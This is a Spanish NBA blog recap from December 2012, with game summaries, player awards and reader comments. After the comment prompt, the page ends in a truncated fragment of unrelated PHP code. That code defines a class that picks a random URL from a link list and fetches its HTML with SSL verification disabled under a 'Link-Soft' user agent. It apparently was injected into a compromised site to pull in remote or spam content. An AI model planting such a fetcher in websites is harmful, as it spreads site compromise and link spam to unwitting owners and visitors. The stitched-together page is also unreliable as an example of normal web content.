La Crónica: Pequeña caja de sorpresas

04 de December de 2012 por TheDeerHunter

A priori jornada ligera de transición. 6 partiditos sin ningún contender y sin grandes atractivos. Sin embargo, anoche mismo en directo ya empezabais con el run-run de que los Bobcats estaban apalizando a los Blazers una vez transcurrido el primer cuarto y algunos aprovechasteis para conectar con el partido de Charlotte. Gran acierto. Impresiona el estado de forma que atraviesa Ben Gordon (¿no habrá algún contrato que firmar por ahí?). Anoche trituró a sus rivales y el récord de la franquicia con 8 triples (8 de 12) para atravesar la barrera de los 10.000 puntos con los 29 de anoche. El hombre está rozando el 50% este curso desde la larga distancia. Con la ayuda de Kemba, Mullens y Sessions los Bobcats se escapaban de 18 puntos a falta de 5’17”. Espero que a nadie se le ocurriera cerrar los ojitos, porque en esos 5 minutos los Blazers se las apañaron para anotar 23. La tuvo Kemba para definir pero anoche no tocaba. En la prórroga los Blazers dominaron (118-112). Espectacular Aldridge, ayudado por Batum, Lillard y Matthews, pero (oh, noticia) fundamental por una vez el banco. Volvía Henderson por los Bobcats, por cierto, pero no fue titular.

El menú siguió con un duelo algo más feo entre Cavs y Pistons en Detroit que se llevaron los locales (79-89) pero después todo fueron partidazos. Los Hornets le dieron una buena a los Bucks en Nueva Orleans. Anderson y Robin Lopez dominando (¿quién te ha visto, chaval?) y muy poquitos errores en los locales, frente al juego esquizofrénico de los ciervos (81-102). Después los Raptors casi la lían en Denver. Aquellos son como los del chiste (casi hoy, casi mañana, casi pasado…). Les faltó lo de siempre para la remontada épica. Calderón sólo contó con 16 minutillos (110-113). 

Griffin volvió a ser la bestia en la victoria en Salt Lake, 3ª consecutiva de los Clippers. 30 puntos y 11 rebotes en su mejor actuación del año, bien arropado por Crawford, Paul y Bledsoe, pero también de Jordan con un tapón ganador a Al Jefferson a falta de 20 segundos con empate (105-104).

Por último, Orlando explotaba su momento mágico ganando también en Oakland (102-94). Gran juego colectivo, con 5 tíos que siempre dan el callo. Pueden salir muy reforzados anímicamente de esta gira.

PREMIOS

MVP: Lamarcus Aldridge fue fundamental en la victoria de los Blazers. No solo por anotar 25 puntos y capturar 13 rebotes sinó también por ser parte activa e importante en la remontada de los suyos. Blake Griffin se fue a los 30 puntos y 11 rebotes en la victoria de los Clippers.

Rookie: Damian Lillard sigue confirmando como el RoY. 24 puntos y 9 asistencias más que engrosas a sus estadísticas. Kyle Singler sigue sólido con sus 15 puntos y 6 rebotes y Andre Drummond cuajó un buen partido con 7 puntos, 12 rebotes y 3 tapones.

Sorpresa: Los Magic suman y siguen guiados por Glen Davis (24-4-6), JJ Redick (22-5-7) y Nikola Vucevic (14-15).

Decepción: Los Bucks se desinflan. Ayer no fueron rival para los Hornets. Marquis Daniels, John Henson y Ekpe Udoh, todos titulares, se combinaron para anotar 11 puntos.

Esfuerzo en vano: Stephen Curry y Ben Gordon jugaron buenos partidos pero no se vieron recompensados. El primero anotó 25 puntos y repartió 11 asistencias mientras que el segundo se fue a los 29 puntos.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Hostia, también vi bastante de los Bucks@Hornets… y la conclusión es que los Bucks tienen a Jennings y Ellis, y el resto son una pléyade de treses falsos, cuatros que no tienen físico para defender a nadie y cincos que alguna vez en sus carreras han sido treses pero ahora juegan ahí, y todo porque Gooden y Dalembert no juegan, porque Ilyasova está fatal, totalmente desquiciado. Según la gente es lo del cazo mix, jejej. Luego tienes jovencillos que no lo acaban de hacer del todo mal, pero que realmente no apetece mucho ver. El caso es que es un jaleo que se ha montado Skiles, que ya no sabe ni por qué rota y para mí, el partidazo que hace ayer Ryan Anderson es impecable. Osea, daba igual a quién le pusieran a defenderle, que las metía sin mirar. Impresionante sus fundamentos de técnica individual.

    Y a ver quién es el guapo que vuelve a llamar overrated a Griffin. En realidad este chaval ha pegado un gran cambio este año y ya las enchufa a media distancia. Se le nota que ha trabajado

      Citar

  2. nba dice:
    #2

    Habra que ver lo que pìden los Lakers por Pau, pero viendo el grado de desquiciamiento que hay actualmente en Milwakee no veria con malos ojos que Pau acabase en los Bucks, asi a este se le acabarian las excusas para no rendir en pista

      Citar

  3. Ruxixón dice:
    #3

    Muy animado el Blazers @ Bobcats.La verdad es que este año es bastante interesante ver los partidos del equipo de Jordan,y creo que el señor Dunlap al frente ha hecho grupo ahí.Interesante a su vez el backourt del equipo: Kemba-Taylor(¿robo del draft?)-Kidd-Gilchrist por un lado,Sessions-Gordon-Henderson por otro.Muchas combinaciones por fuera,algo más limitados por dentro pero con un Mullens que cuando se atreve tiene trazas de gran jugador.

    Lamentablemente se dejaron comer la tostada y entre el señor Lillard en plan jugador franquicia primero,luego el señor “Aldridge al 70%” me cojo este rebote y te la enchufo,el señor Babbitt con unos triples por ahí y unas faltas por aquí que no me pitan….culminaron una remontada que no se preveía.El final de partido de Kemba afea un poco su actuación pero jugó muy bien.De todo se aprende y creo que esta derrota,siendo optimistas,es buena para que vayan cogiendo mala uva.

      Citar

  4. Sancho88 dice:
    #4

    La falta de Babbit a Gordon en la prórroga, ese hachazo para roba el balón es acojonante que no se pitase… pero bueno, no fue injusta la victoria de los Blazers

      Citar

  5. Sancho88 dice:
    #5

    Por cierto, Pau estará esta noche en la lista de inactivos contra los Rockets. Tendinitis… o algo más?
    A ver qué tal lo hace Jordan Hill o Robert Sacre. Yo digo que Hill de 10-10 no baja esta noche, jejej
    Y Kobe a 58 puntos de los 30.000 no? Si lo hace esta noche es para flipar.

      Citar

  6. nba dice:
    #6

    Mira tu por donde parece que se empiezan a hacer las cosas con sentido, si el tio no puede correr pues que descanse y nos evite el bochorno de ver sus ultimas actuaciones, sera buen momento para Jordan Hill de disponer de minutos ya que ultimamente estaba practicamente olvidado en la rotacion

      Citar

  7. MagicJohnson32 dice:
    #7

    Sancho88:
    Por cierto, Pau estará esta noche en la lista de inactivos contra los Rockets. Tendinitis… o algo más?
    A ver qué tal lo hace Jordan Hill o Robert Sacre. Yo digo que Hill de 10-10 no baja esta noche, jejej
    Y Kobe a 58 puntos de los 30.000 no? Si lo hace esta noche es para flipar.

    Aseguran que no hay nada más, que realmente necesita recuperarse. Es una decisión que debieron tomar hace un par de semanas, pero más vale tarde…

      Citar

  8. Jose Luis dice:
    #8

    A ver cuando se le ocurre a D’Antoni lo de quitar a Howard en un partido ajustado. Lakers ganando por 6 a falta de 3 minutos y parcial 16-8 en contra, y eso que Bryant metió un triple para ponerse uno abajo, aunque falló el triple final. Con Lakers 6 arriba empezaron a hacerle faltas a Howard.

    Yo lo veo clarísimo. Pau debe jugar de Center los últimos minutos, es innegociable. Howard puede jugar todo el partido excepto los 5 últimos minutos del último cuarto, no hay más. Serían unos 36 minutos aprox (10+8+10+5/7) lo cual es bastante para una estrella como él, y Pau podría llegar a unos 32, lo que sumaría 68. Hasta 96 quedan 28 para Jamison y Hill, no está nada mal.

      Citar

  9. Chipi dice:
    #9

    Después de la tradición de levantarme y ver los boxcores mientras me tomo mi café, espero ansioso la crónica para saber a quién echarán la culpa d la derrota laker de hoy y….. ¿cómo narices han ganado los Wizards a Miami?

      Citar

  10. simon dice:
    #10

    Sancho88:
    Yo digo que Hill de 10-10 no baja esta noche, jejej

    UUyyy!!!! 9-9 jajaja a punto estuvo! Madremia impresionantes números de Z-BO 38-22…

      Citar

  11. Sancho88 dice:
    #11

    SUS LO DIJE!!!!!!!!!!! Jordan Hill no es tan paquete coño. Y ahí está mi apuesta para el MVP hasta ahora. Olé Z-BO!!

      Citar

  12. Txusma dice:
    #12

    Chipi:
    Después de la tradición de levantarme y ver los boxcores mientras me tomo mi café, espero ansioso la crónica para saber a quién echarán la culpa d la derrota laker de hoy y….. ¿cómo narices han ganado los Wizards a Miami?

    Levantarse a las 5h00… Uff, que duro!

      Citar

  13. Chipi dice:
    #13

    Txusma: Levantarse a las 5h00… Uff, que duro!

    Las calles no se ponen solas, amigo 😛

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>